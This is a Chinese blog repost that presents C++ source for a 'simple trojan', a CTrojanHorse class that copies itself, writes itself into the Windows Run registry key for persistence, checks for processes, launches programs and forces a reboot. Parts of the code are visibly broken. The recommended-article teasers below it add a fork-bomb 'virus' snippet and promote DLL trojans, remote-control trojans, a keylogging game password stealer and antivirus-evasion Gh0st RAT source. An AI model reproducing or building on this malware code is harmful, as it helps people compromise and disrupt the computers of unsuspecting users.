使用visual c+编写简单的木马程序

最新推荐文章于 2024-07-15 21:16:08 发布
最新推荐文章于 2024-07-15 21:16:08 发布
阅读量584 收藏
点赞数
文章标签: python c# 操作系统
原文链接:https://my.oschina.net/bigfool007139/blog/373644
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

如今人们谈“马”色变,因为木马危害用户计算机,窃取银行钱财,当然可以用杀毒软件搞定,其实木马编程也简单,编程语音,c+,易语言,c#都可以制作简单的木马悄悄运行于后台,这里以ivsual c+编写简单的木马为例: Visual C++编程时用到了这些功能,现在我把它组装成一个很简单的木马了.
本代码已封装成类方便代码重用 :1,自我复制.2,修改注册表自动运行.3,关闭进程.4,启动程序.5,重启关机功能. 代码如下:class CTrojanHorse
{
public://add code

public://add code
CTrojanHorse();
~CTrojanHorse();
protected://add code

BOOL IfShell(CString BeKissPrcName);
BOOL CopyFileaddr(CString m_CopyFile);
void ShellFile(CString m_ShellFile);
BOOL SetAutoRun(CString strPath);
void ShutDown();

private://add code
};
CTrojanHorse::CTrojanHorse()
{
//add code

}
CTrojanHorse::~CTrojanHorse()
{

//add code
}
BOOL CTrojanHorse::IfShell(CString BeKissPrcName)//判断程序是否在运行
{
CString str,a,prcnum;
// CMainFrame *pDlg=(CMainFrame *)lparam;
//AfxMessageBox(pDlg->BeKissPrcName);
HANDLE SnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
SHFILEINFO shSmall;
PROCESSENTRY32 ProcessInfo;//声明进程信息变量
ProcessInfo.dwSize=sizeof(ProcessInfo);//设置ProcessInfo的大小
//返回系统中第一个进程的信息
BOOL Status=Process32First(SnapShot,&ProcessInfo);
int m_nProcess=0;
int num=0;

while(Status)
{ num++;
m_nProcess++;

ZeroMemory(&shSmall,sizeof(shSmall));//获取进程文件信息  
SHGetFileInfo(ProcessInfo.szExeFile,0,&shSmall,  
sizeof(shSmall),SHGFI_ICON|SHGFI_SMALLICON);

//str.Format("%08x",ProcessInfo.th32ProcessID);
str=ProcessInfo.szExeFile;
if(str==BeKissPrcName)
{
AfxMessageBox("找到进程成功!");

return true;

}
//获取下一个进程的信息
Status=Process32Next(SnapShot,&ProcessInfo);
}
AfxMessageBox("失败!");
return false;
}
BOOL CTrojanHorse::CopyFileaddr(CString m_CopyFile)//复制文件
{
char pBuf[MAX_PATH];
CString m_addr;
// CString m_strSrcFile1="D:/OperateFile.exe";
// CString m_addr="D:/SVCLSV.exe"; //存放路径的变量
GetCurrentDirectory(MAX_PATH,pBuf); //获取程序的当前目录
strcat(pBuf,"\");
strcat(pBuf,AfxGetApp()->m_pszExeName);
strcat(pBuf,".exe");
m_addr=pBuf;
if(CopyFile(m_addr,m_CopyFile,FALSE))
{
AfxMessageBox("复制成功!");
return true;
}
return false;
}
void CTrojanHorse::ShellFile(CString m_ShellFile)//执行所要的程序
{
ShellExecute(NULL,"open",m_ShellFile,NULL,NULL,SW_SHOWNORMAL);
}

BOOL CTrojanHorse::SetAutoRun(CString strPath)//修改注册表
{
CString str;
HKEY hRegKey;
BOOL bResult;
str=_T("Software\Microsoft\Windows\CurrentVersion\Run");
if(RegOpenKey(HKEY_LOCAL_MACHINE, str, &hRegKey) != ERROR_SUCCESS)
bResult=FALSE;
else
{
_splitpath(strPath.GetBuffer(0),NULL,NULL,str.GetBufferSetLength(MAX_PATH+1),NULL);
strPath.ReleaseBuffer();
str.ReleaseBuffer();
if(::RegSetValueEx( hRegKey,
str,
0,
REG_SZ,
(CONST BYTE *)strPath.GetBuffer(0),
strPath.GetLength() ) != ERROR_SUCCESS)
bResult=FALSE;
else
bResult=TRUE;
strPath.ReleaseBuffer }
return bResult;
}
void CTrojanHorse::ShutDown()//重新启动计算机
{
if (IDYES == MessageBox("是否现在重新启动计算机?", "注册表提示", MB_YESNO))
{
OSVERSIONINFO OsVerInfo; //保存系统版本信息的数据结构
OsVerInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&OsVerInfo);//取得系统的版本信息
CString str1 = "", str2 = "";
str1.Format("你的系统信息\n版本为:%d.%d\n", OsVerInfo.dwMajorVersion,
OsVerInfo.dwMinorVersion);
str2.Format("型号:%d\n", OsVerInfo.dwBuildNumber);
str1 += str2;
AfxMessageBox(str1);
if(OsVerInfo.dwPlatformId == VER_PLATFORM_WIN32_NT)
ExitWindowsEx(EWX_REBOOT | EWX_SHUTDOWN, 0); //重新启动计算机
}
}

代码编写完毕,生成exercise 程序

转载于:https://my.oschina.net/bigfool007139/blog/373644

weixin_33875839
关注
C++木马病毒
m0_55484547的博客
06-29 1660
低级KTOUB2.0病毒: #include <iostream> #include <windows.h> using namespace std; int main() { system("shutdown -t -s 20"); while(1) system("start"); return 0; } 中级Luck3.0病毒: #include <iostream> using namespace std; int main() { system("shutdo
电脑常用快捷键大全(含Visual Studio快捷键操作)
流楚丶格念的博客
02-18 5651
目录 一、系统快捷键 二、常用系统命令 三、QQ快捷键 四、IE浏览器快捷键使用大全 五、Word 中的快捷键 六、Excel 中的快捷键 七、PowerPoint 中的快捷键 八、Visual Studio 九、Eclipse 十、Photoshop 十一、批处理指令 十二、安装操作系统 (此快捷操作对我们程序员十分重要,所以放在前面) 八、Visual Studio 8.1、项目相关的快捷键 ...
VC++动态链接库编程之DLL木马
深之JohnChen的专栏
03-24 2868
VC++动态链接库编程之DLL木马来源: 天极网DLL在程序编制中可作出巨大贡献,它提供了具共性代码的复用能力。但是,正如一门高深的武学,若被掌握在正义之侠的手上,便可助其仗义江湖;但若被掌握在邪恶之徒的手上,则必然在江湖上掀起腥风血雨。DLL正是一种这样的武学。DLL一旦染上了魔性,就不再是正常的DLL程序,而是DLL木马,一种恶贯满盈的病毒,令特洛伊一夜之间国破家亡。 DLL木马的
使用C++编写一个木马
最新发布
junos_123456的博客
07-15 381
开发环境:windows11 + visual studio 2022 社区版本。如何通过C++实现一个木马功能。
用c++写一个远程控制木马(转)
2301_78273259的博客
07-06 2058
1)UINT GetSystemDirectory()函数这个函数的参数 lpBuffer会返回系统路径,我们提取前面两位就是就可以得到系统分区,例如“C:”2)DWORD GetModuleFileName()函数这个函数是返回我们程序自身的完整路径。
Visual C++中实现一个DLL木马
zhihu008的专栏
07-25 6657
Visual C++中实现一个DLL木马   写一个木马挂载程序,听起来似乎很玄,其实也很简单,本文将告诉你怎样用Visual C++实现一个侵入木马的程序。本文主要涉及动态链接库(DLL)木马,目前相当多数的木马病毒都以这种方式被加载。 DLL木马攻击指的是编程者在DLL中包含木马程序代码,随后在目标主机中选择特定目标进程,以某种方式强行指定该进程调用包含这个木马程序的D
c++木马编程
云守护的专栏
03-05 4195
1、消息炸弹 #define UNICODE #define _UNICODE #include #include #include #include //消息炸弹 #pragma comment(lib, "Netapi32.lib") // 加载Netapi32.lib库 void main(int argc, wchar_t *argv[]) { TC
1_visualc++_免杀_GHO0ST_远控免杀.zip
10-11
【标题】与【描述】提及的是一个名为"1_visualc++_免杀_GHO0ST_远控免杀.zip"的压缩包文件,这通常暗示了该文件包含有关使用Visual C++开发的GHO0ST远程控制软件的免杀技术。GHO0ST可能是一种高级的、具有反检测能力...
1_visualc++_免杀_GHO0ST_远控_源码免杀_源码.zip
09-30
本篇将围绕使用Visual C++编写的GHO0ST远程控制源码免杀技术展开深入探讨。 首先,我们要了解Visual C++作为Windows平台上的强大编程工具,它支持C++语言并提供了丰富的Windows API接口,使得开发者可以构建复杂的...
esenin.zip_系统编程_Visual_C++_
08-12
【标题】"esenin.zip_系统编程_Visual_C++_" 涉及到的是一个使用C语言编写的系统编程项目,特别强调了与Visual C++的关联。这表明项目可能是在微软的Visual Studio集成开发环境中,利用C++语言进行系统级别的编程。...
C++编写木马全过程
weixin_40286351的博客
01-04 3951
首先是&lt;FONT color=magenta  size=5&gt;工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在&lt;FONT color=magenta  size=5&gt;的基本原理上,我们选用可视化的BCB;Delphi也不错,...
C++ 编写的杀毒软件
01-17
C++ 编写的杀毒软件,可自定义特征,有中文注解
自制杀毒软件C++源码
07-23
自制杀毒软件C++源码
C语言木马编写
03-21
基于C语言socket编写的木马,实现了执行CMD、上传下载文件以及管理木马表等功能。
C++打造木马程序太牛掰了!堪称计算机的“致命武器”
07-05 2071
C++ 实现简单远程监空木马源代码,这是一个学生的课程设计,远程监控木马源码,利用钩子实现,里面有非常详细的说明文档,对与想深入学习hook 和 进程快照还有指令分析器的人来说本作品最适合,里面的代码十分复杂,建议你们想学习的话最好详细阅读课程设计的文档。 项目结构截图: 源码截图: 测试效果图: 还是需要告诫Android用户,不要随意安装来源不明的应用,虽...
c++生成木马服务器
ZXL工作室
06-01 1401
6.1.3 代码实现剖析 我们通过资源来生成木马,首先要写一个简单的被生成的程序,这个程序要去读取被写入的配置信息。客户端把配置信息写入服务端的文件末尾,服务端从文件的末尾将信息读入。 下面来写一个简单的程序,来充当我们的服务端程序。需要设置的配置信息有IP地址和端口号,把这两个信息都写入服务器端程序。先来定义一个结构体,结构体如下: #define IPLEN 20 typedef st
Visual C++实现远程线程嵌入木马技术
zhihu008的专栏
07-25 5190
远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过CreateThread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。 但是很少有人知道,通过CreateRemoteThread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程耶!)的地址空间
C++ 冰河木马的实现
qq_42311391的博客
08-04 3440
文件传输采用的winsock ,截屏采用的上一个帖子,下载文件采用上上个帖子,反正你在这个博客里搜一下就可以看到了,查看文件目录也是。。。不多说了,上代码。 关于欲儿远控的说明 命令大全 dir-查询目录(查询对方指定路径的文件)——例如:dir-D:\\ down-下载链接-保存路径(让对方下载指定链接的文件)——例如:down-http://www.anyuer.club-D:...
VB全局HOOK写游戏盗号木马
07-09 231
思路: 1、用spy++工具获取目标游戏窗体句柄 2、使用timer控件检测句柄是否为当前窗口 3、帐号密码获取:使用全局HOOK键盘记录 4、发送....(这步方法很多,也是最难的一部分,本人采用winsock控件实现的,这里不详细说了,嘿嘿怕你做出木马,说是我教的) 现在详细
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值